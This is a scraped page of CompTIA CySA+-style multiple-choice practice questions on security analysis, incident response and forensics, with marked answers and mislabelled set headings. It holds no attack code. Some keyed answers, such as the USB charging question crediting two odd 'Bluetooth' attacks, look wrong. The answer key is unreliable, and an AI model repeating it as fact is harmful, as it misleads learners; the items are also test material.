CompTIA Cyber Security Analyst (CySA+) Practice Exams 2019 Set 5

A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze thelogs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output areport?


Options are :

  • OSSIM
  • Syslog
  • Kali
  • Splunk (Correct)

Answer : Splunk

CompTIA CySA+ Set 3

An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thoroughforensic review, the administrator determined the servers BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to aknown good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?


Options are :

  • File integrity monitoring
  • TPM data sealing (Correct)
  • Anti-malware application
  • Host-based IDS

Answer : TPM data sealing

As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined inthe SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Select two.)


Options are :

  • Timing of the scan (Correct)
  • Incident response policies
  • Maintenance windows
  • Excluded hosts (Correct)
  • IPS configuration
  • Contents of the executive summary report

Answer : Timing of the scan Excluded hosts

An analyst reviews a recent report of vulnerabilities on a companys financial application server. Which of the following should the analyst rate as being of theHIGHEST importance to the companys environment?


Options are :

  • Susceptibility to XSS
  • Use of old encryption algorithms
  • Banner grabbing
  • Remote code execution (Correct)
  • SQL injection

Answer : Remote code execution

CompTIA JK0-022 Security Cryptography Certification Exam Set 6

A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as rootand browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following securityarchitecture areas should the administrator recommend review and modification? (Select TWO).


Options are :

  • Log aggregation and analysis (Correct)
  • Software assurance
  • Encryption
  • Acceptable use policies (Correct)
  • Network isolation and separation
  • Password complexity

Answer : Log aggregation and analysis Acceptable use policies

A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsoredauthentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP?


Options are :

  • Guests using the wireless network should provide valid identification when registering their wireless devices. (Correct)
  • The corporate network should have a wireless infrastructure that uses open authentication standards.
  • Sponsored guest passwords must be at least ten characters in length and contain a symbol.
  • The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.

Answer : Guests using the wireless network should provide valid identification when registering their wireless devices.

A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be theBEST action for the cybersecurity analyst to perform?


Options are :

  • Inform users regarding the affected systems.
  • Shut down all server interfaces.
  • Inform management of the incident. (Correct)
  • Continue monitoring critical systems.

Answer : Inform management of the incident.

CompTIA JK0-015 E2C Security+ Certification Practice Test Set 6

The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premise implementation. A criticalapplication that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid clouddeployment model. Which of the following should be conducted FIRST?


Options are :

  • Develop a request for proposal.
  • Perform a risk assessment.
  • Review the SLA for FISMA compliance.
  • Review current security controls. (Correct)

Answer : Review current security controls.

A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through anunknown proxy. This type of attack is known as which of the following?


Options are :

  • Phishing
  • Shoulder surfing
  • Social engineering
  • Man-in-the-middle (Correct)

Answer : Man-in-the-middle

An investigation showed a worm was introduced from an engineers laptop. It was determined the company does not provide engineers with company-ownedlaptops, which would be subject to company policy and technical controls.Which of the following would be the MOST secure control implement?


Options are :

  • Utilize a jump box that is only allowed to connect to clients from the management network.
  • Deploy a company-wide approved engineering workstation for management access. (Correct)
  • Deploy HIDS on all engineer-provided laptops, and put a new router in the management network.
  • Implement role-based group policies on the management network for client access.

Answer : Deploy a company-wide approved engineering workstation for management access.

CompTIA JK0-801 A+ Certification Practical Exam Set 1

After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve auser navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowinginappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment?


Options are :

  • Cross training
  • Separation of duties (Correct)
  • Succession planning
  • Automated reporting

Answer : Separation of duties

As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following typesof testing is being performed?


Options are :

  • Input validation
  • Regression testing
  • Fuzzing (Correct)
  • Stress testing

Answer : Fuzzing

A cybersecurity analyst is completing an organizations vulnerability report and wants it to reflect assets accurately. Which of the following items should be in thereport?


Options are :

  • Asset isolation
  • Log disposition
  • Organizational governance
  • Processor utilization
  • Virtual hosts (Correct)

Answer : Virtual hosts

220-701 A+ Essentials Certification Practice Exam Set 11

A cybersecurity analyst is hired to review the security posture of a company. The cybersecurity analyst notices a very high network bandwidth consumption due toSYN floods from a small number of IP addresses.Which of the following would be the BEST action to take to support incident response?


Options are :

  • Block all SYN packets.
  • Install a packet capturing tool.
  • Apply ingress filters at the routers. (Correct)
  • Increase the companys bandwidth.

Answer : Apply ingress filters at the routers.

An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A fullantivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?


Options are :

  • Cookie stealing
  • Zero-day attack (Correct)
  • Session hijack
  • Known malware attack

Answer : Zero-day attack

A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the defaultpassword. Which of the following is the MOST secure solution to remediate this vulnerability?


Options are :

  • Change the default password, whitelist specific source IP addresses, and require two-factor authentication.
  • Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication. (Correct)
  • Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication.
  • Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication.

Answer : Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.

CompTIA Cyber Security Analyst (CySA+) Practice Exams 2019 Set 12

Which of the following commands would a security analyst use to make a copy of an image for forensics use?


Options are :

  • wget
  • dd (Correct)
  • rm
  • touch

Answer : dd

An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the dataand making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting?


Options are :

  • Availability analysis
  • Behavior analysis
  • Business analysis
  • Trend analysis (Correct)

Answer : Trend analysis

A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsoredauthentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP?


Options are :

  • Guests using the wireless network should provide valid identification when registering their wireless devices. (Correct)
  • The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.
  • Sponsored guest passwords must be at least ten characters in length and contain a symbol.
  • The corporate network should have a wireless infrastructure that uses open authentication standards.

Answer : Guests using the wireless network should provide valid identification when registering their wireless devices.

JK0-019 CompTIA E2C Network + Certification Exam Set 4

Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company As conference rooms. This access is provided toallow partners the ability to establish VPNs back to Company Bs network. The security architect for Company A wants to ensure partners from Company B are ableto gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports.Which of the following can be employed to allow this?


Options are :

  • SAML
  • ACL
  • SIEM
  • NAC (Correct)
  • MAC

Answer : NAC

A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt tocause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should thisoccur? (Select two.)


Options are :

  • Prototyping phase (Correct)
  • Static code analysis
  • Requirements phase
  • Planning phase
  • Fuzzing (Correct)
  • Behavior modeling

Answer : Prototyping phase Fuzzing

A security operations team was alerted to abnormal DNS activity coming from a users machine. The team performed a forensic investigation and discovered a hosthad been compromised. Malicious code was using DNS as a tunnel to extract data from the client machine, which had been leaked and transferred to an unsecurepublic Internet site. Which of the following BEST describes the attack?


Options are :

  • Cache poisoning
  • Data exfiltration (Correct)
  • Phishing
  • Pharming

Answer : Data exfiltration

220-802 CompTIA A+ Certification Practice Exam Set 10

A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following itemswould be MOST helpful to secure the PC? (Choose three.)


Options are :

  • Chain of custody form (Correct)
  • Tamper-proof seals (Correct)
  • Drive eraser
  • Network tap
  • Write blockers
  • Faraday cage (Correct)

Answer : Chain of custody form Tamper-proof seals Faraday cage

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) wascontacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporations quarterly taxreturns. Which of the following types of testing would help prevent this from reoccurring?


Options are :

  • Input validation testing
  • Security regression testing
  • User acceptance testing (Correct)
  • Static code testing

Answer : User acceptance testing

A security analyst at a small regional bank has received an alert that nation states are attempting to infiltrate financial institutions via phishing campaigns. Which ofthe following techniques should the analyst recommend as a proactive measure to defend against this type of threat?


Options are :

  • System isolation
  • Mandatory access control
  • Bastion host
  • Honeypot
  • Location-based NAC (Correct)

Answer : Location-based NAC

NEW! CompTIA A+ 2019 Cert. Core 2 (220-1002) Practice Tests Set 10

External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following softwaredevelopment best practices would have helped prevent this issue?


Options are :

  • Input validation
  • Fuzzing
  • Regression testing
  • Stress testing (Correct)

Answer : Stress testing

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator.The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened inthis situation?


Options are :

  • The analyst is not using the standard approved browser.
  • The alert in unrelated to the analysts search.
  • The analyst has prefetch enabled on the browser in use. (Correct)
  • The analyst accidently clicked a link related to the indicator.

Answer : The analyst has prefetch enabled on the browser in use.

Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment?


Options are :

  • Place the malware on a virtual server running SIFT and begin analysis.
  • Place the malware on a virtual server connected to a VLAN.
  • Place the malware on an isolated virtual server disconnected from the network. (Correct)
  • Place the malware in a virtual server that is running Windows and is connected to the network.

Answer : Place the malware on an isolated virtual server disconnected from the network.

Test : CompTIA Network+ (N10-007)

A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of thefollowing are common attack techniques that take advantage of this practice? (Choose two.)


Options are :

  • A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch theattack (a prerecorded series of keystrokes)
  • A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs
  • A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking
  • A Bluetooth peering attack called Snarfing that allows Bluetooth connections on blocked device types if physically connected to a USB port (Correct)
  • A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack (Correct)

Answer : A Bluetooth peering attack called Snarfing that allows Bluetooth connections on blocked device types if physically connected to a USB port A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack

A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following shouldhappen NEXT?


Options are :

  • Implement continuous monitoring.
  • Start the change control process. (Correct)
  • Rescan to ensure the vulnerability still exists.
  • Begin the incident response process.

Answer : Start the change control process.

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions